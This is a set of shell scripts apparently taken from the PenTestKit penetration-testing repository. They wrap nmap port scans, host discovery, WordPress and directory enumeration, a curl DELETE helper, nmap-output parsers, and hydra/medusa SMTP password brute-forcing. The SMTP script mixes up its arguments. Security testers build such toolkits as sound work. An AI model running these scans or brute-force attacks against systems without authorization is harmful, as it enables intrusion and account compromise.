7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | 26 | if [[ $EUID -ne 0 ]]; then 27 | echo "For better results, please run this script as root." 1>&2 28 | exit 1 29 | fi 30 | 31 | if [ $# -eq 1 ]; then 32 | LOGNAME="local_live_hosts_netbios_$1.txt" 33 | LOGNAME=$(echo "$LOGNAME" | sed -r 's/[/]+/_/g') 34 | nbtscan -e $1 > $LOGNAME 35 | else 36 | echo "Please provide a target ip range." 37 | fi 38 | 39 | 40 | -------------------------------------------------------------------------------- /port-scanning/tcp/full/tcp-ports-scan-full-delay-sequential-noping.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | if [[ $EUID -ne 0 ]]; then 25 | echo "Please run this script as root." 1>&2 26 | exit 1 27 | fi 28 | 29 | if [ $# -eq 2 ]; then 30 | nmap -sS -vv -r -p- --reason -Pn --open --scan-delay $2 -oA tcp_ports_full_delay_sequential_$1 $1 31 | else 32 | echo "Please provide the target IP address or an IP range and the scan delay time(seconds)." 33 | fi 34 | -------------------------------------------------------------------------------- /port-scanning/udp/full/udp-ports-scan-full-super-fast-noping-nodns.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [[ $EUID -ne 0 ]]; then 26 | echo "Please run this script as root." 1>&2 27 | exit 1 28 | fi 29 | 30 | if [ $# -eq 1 ]; then 31 | nmap -sU -n -Pn -vv -p- --reason --open --defeat-icmp-ratelimit -T4 -oA udp_ports_full_$1 $1 32 | else 33 | echo "Please provide the target IP address or an IP range." 34 | fi 35 | -------------------------------------------------------------------------------- /web/wordpress-scan.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 1 ]; then 26 | LOGNAME="wpscan_$1" 27 | LOGNAME=$(echo "$LOGNAME" | sed -r 's/[/]+/_/g' | sed -r 's/[.]+/_/g' | sed -r 's/[:]+//g') 28 | LOGNAME="$LOGNAME.txt" 29 | wpscan -v --url $1 --update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee $LOGNAME 30 | else 31 | echo "Please provide the URL." 32 | fi 33 | -------------------------------------------------------------------------------- /web/eyewitness.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2023 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | 26 | if [ $# -eq 3 ]; then 27 | eyewitness --web -f "$1" --threads 10 --max-retries 2 -d "$2" --user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.44" --no-prompt 28 | else 29 | echo "Please provide a Line seperated file containing URLs to capture, a Directory name for report output and a User-Agent string." 30 | fi 31 | -------------------------------------------------------------------------------- /port-scanning/tcp/tcp-scan-web-server.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [[ $EUID -ne 0 ]]; then 26 | echo "Please run this script as root." 1>&2 27 | exit 1 28 | fi 29 | 30 | if [ $# -eq 1 ]; then 31 | nmap -sS -vv -A --osscan-guess --version-all -Pn -p80,81,443,1080,3000,4000,5000,5601,6379,8000,8008,8080,8081,8181,8443,8888,9000,9080,9090,9200,9443,10000,15672 -oA tcp_web_server_$1 $1 32 | else 33 | echo "Please provide the web server." 34 | fi 35 | -------------------------------------------------------------------------------- /web/dir-scanner-fine-tuned.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 3 ]; then 26 | LOGNAME="dirb_big_results_$1" 27 | LOGNAME=$(echo "$LOGNAME" | sed -r 's/[/]+/_/g' | sed -r 's/[.]+/_/g' | sed -r 's/[:]+//g') 28 | LOGNAME="$LOGNAME.txt" 29 | dirb $1 /usr/share/seclists/Discovery/Web-Content/big.txt -a $2 -l -r -S -o $LOGNAME -f -N $3 30 | else 31 | echo "Please provide the target url, a user agent string and an HTTP code to ignore." 32 | fi 33 | -------------------------------------------------------------------------------- /web/dir-scanner-proxy.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 3 ]; then 26 | LOGNAME="dirb_big_results_$1" 27 | LOGNAME=$(echo "$LOGNAME" | sed -r 's/[/]+/_/g' | sed -r 's/[.]+/_/g' | sed -r 's/[:]+//g') 28 | LOGNAME="$LOGNAME.txt" 29 | dirb $1 /usr/share/seclists/Discovery/Web-Content/big.txt -a $2 -l -r -S -o $LOGNAME -p $3:$4 30 | else 31 | echo "Please provide the target url base, the user agent string and the proxy host and port." 32 | fi 33 | -------------------------------------------------------------------------------- /port-scanning/tcp/services/tcp-services-super-fast-scan-noping.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2023 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [[ $EUID -ne 0 ]]; then 26 | echo "Please run this script as root." 1>&2 27 | exit 1 28 | fi 29 | 30 | if [ $# -eq 2 ]; then 31 | nmap -sS -vv -A --osscan-guess --version-all -Pn -p$2 -T4 --defeat-rst-ratelimit -oA tcp_services_$1 $1 32 | else 33 | echo "Please provide the target IP address or an IP range and the open TCP ports separated by comma." 34 | fi 35 | -------------------------------------------------------------------------------- /port-scanning/udp/services/udp-services-super-fast-scan-noping.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [[ $EUID -ne 0 ]]; then 26 | echo "Please run this script as root." 1>&2 27 | exit 1 28 | fi 29 | 30 | if [ $# -eq 2 ]; then 31 | nmap -sU -vv -A --osscan-guess --version-all -Pn -p$2 -T4 --defeat-icmp-ratelimit -oA udp_services_$1 $1 32 | else 33 | echo "Please provide the target IP address or an IP range and the open UDP ports separated by comma." 34 | fi 35 | -------------------------------------------------------------------------------- /grep/grep-list-hosts-open-ports-and-services-to-matrix.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | if [ $# -eq 1 ]; then 25 | 26 | egrep -v "^#|Status: Up" *.gnmap|cut -d' ' -f2,4-|sed 's/Ignored.*//g' |sed 's/ /_/'| sed 's/, /,/g'| awk -v FS=_ '{printf $1 ";" NF ";"; $1=""; for(i=2; i<=NF; i++){ a=a""$i; }; split(a,s,","); for(e in s) { split(s[e],v,"/"); printf "%s(%s)[%s],", v[1], v[5], v[7]}; a=""; printf "\n"; }' 27 | 28 | else 29 | echo "Please provide a directory path." 30 | fi 31 | -------------------------------------------------------------------------------- /web/curl-delete.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | # e.g. $1 == Accept header 26 | # e.g. $2 == Auth Cookie header 27 | # e.g. $3 == proxy (http://127.0.0.1:8080) 28 | # e.g. $4 == target url 29 | 30 | if [ $# -eq 4 ]; then 31 | curl -X DELETE --header "$1" --header 'Accept-Language: en' --header "$2" -x "$3" --insecure --include "$4" 32 | else 33 | echo "Please provide Accept header, content-type, authorization cookie, post data, proxy server and target url." 34 | fi 35 | -------------------------------------------------------------------------------- /grep/grep-list-hosts-open-ports-and-services-to-txt.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | if [ $# -eq 1 ]; then 25 | 26 | egrep -v "^#|Status: Up" $1/*.gnmap|cut -d' ' -f2,4-|sed 's/Ignored.*//g' |sed 's/ /'$'_''/'|sed 's/, /,/g'| awk -v FS=_ '{printf "Host: " $1 "\nOpen ports: " NF "\n"; $1=""; for(i=2; i<=NF; i++){ a=a""$i; }; split(a,s,","); for(e in s) { split(s[e],v,"/"); printf "%-10s%-20s%s\n", v[1], v[5], v[7]}; a=""; printf "\n"; }' 27 | else 28 | echo "Please provide a directory path." 29 | fi 30 | -------------------------------------------------------------------------------- /live-hosts/discover-local-live-hosts-netdiscover.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2019 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [[ $EUID -ne 0 ]]; then 26 | echo "For better results, please run this script as root." 1>&2 27 | exit 1 28 | fi 29 | 30 | if [ $# -eq 2 ]; then 31 | LOGNAME="local_live_hosts_netdiscover_$1.txt" 32 | LOGNAME=$(echo "$LOGNAME" | sed -r 's/[/]+/_/g') 33 | netdiscover -i $1 -r $2 -s 100 -N -P > $LOGNAME 34 | else 35 | echo "Please provide your network device and the target ip range." 36 | fi 37 | 38 | 39 | -------------------------------------------------------------------------------- /cracking/brute-force-smtp-medusa.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | if [ $# -eq 2 ]; then 25 | hydra -v -l $1 -P /usr/share/seclists/Passwords/darkweb2017-top100.txt -s $3 -e nsr -o "smtp_$2_$3_hydra.txt" -f smtp://$2 26 | medusa -v 4 -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -f -e ns -n $2 -O "smtp_$1_$2_medusa.txt" -M smtp -h $1 27 | else 28 | echo "Please provide the target email account, the SMTP server and its port." 29 | fi 30 | --------------------------------------------------------------------------------